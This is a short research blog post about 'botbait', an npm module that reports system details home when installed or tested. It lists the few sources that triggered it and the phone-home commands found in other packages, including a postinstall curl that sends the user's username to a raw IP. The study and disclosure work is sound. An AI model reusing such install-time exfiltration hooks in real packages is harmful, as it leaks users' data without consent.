What Are the Bots Up to on npm?

Last year (2015) I had a thought: who else is downloading and running or testing random modules on npm? I postulated that there might be bots, build systems or other researchers mass-downloading and running modules from npm. I figured it might be an interesting vector for attacking systems and gaining a foothold in some org, and I was curious to know what that traffic looked like.

Illustration by Amy Lynn Taylor

So I set the bait.

I built a module called botbait. This module calls home when it is installed, required, or tested, and reports the following payload.

var payload = {
  process_versions: process.versions,   // versions of node, v8, openssl, etc.
  process_platform: process.platform,   // e.g. linux, darwin, win32
  process_arch: process.arch,           // e.g. x64, arm64
  type: process.argv[2] || 'index.js'   // how the module was invoked; defaults to a plain run/require of index.js
}

The Results

The results are pretty boring. I thought there would be a lot more random installations / tests to be honest.

Total Downloads — 582

Who took the bait?

Unique Sources — 7

The sources that stand out as interesting to me are the ones from Berkeley and Microsoft. I hope that somebody there has some interesting research to share.

Raw data.

2015-06-23T21:04:11.995Z, 193.137.5.49, ran npm test
2015-11-25T18:02:53.950Z, 140.78.145.161, npm i
2016-01-29T16:26:03.223Z, 89.251.52.64, npm i 
2016-08-13T18:19:28.746Z, 131.107.160.43, ran or required index.js
2016-08-26T02:56:44.625Z, 103.6.32.2, npm i
2016-09-30T22:34:10.421Z, 192.31.105.138, ran or required index.js
2016-10-08T04:07:01.342Z, 192.31.105.136, ran or required index.js

Who else is watching?

During my late nights spelunking around the npm registry I found a few others that are calling home.

I do not in any way recommend installing these modules. At the time of writing they were not malicious but you never know.

et_phone_home — pings a URL

wget -q http://176.31.142.25/javascript_no_way_you_got_here_randomly

anarchy — reports to Google Analytics property UA-48351156-4

harmlesspackage — reports your username via a postinstall hook

curl -X GET http://104.131.21.155:8043/?$(whoami)

… I’m sure there are others that I didn’t notice this time around.

Final thoughts

Something I thought would be fun to dig into really wasn’t. It’s not always a glorious result for research. There isn’t a lot of automated activity that’s just downloading all the modules and doing things. Most of the activity comes from registry replicas mirroring the registry.

Originally posted on Medium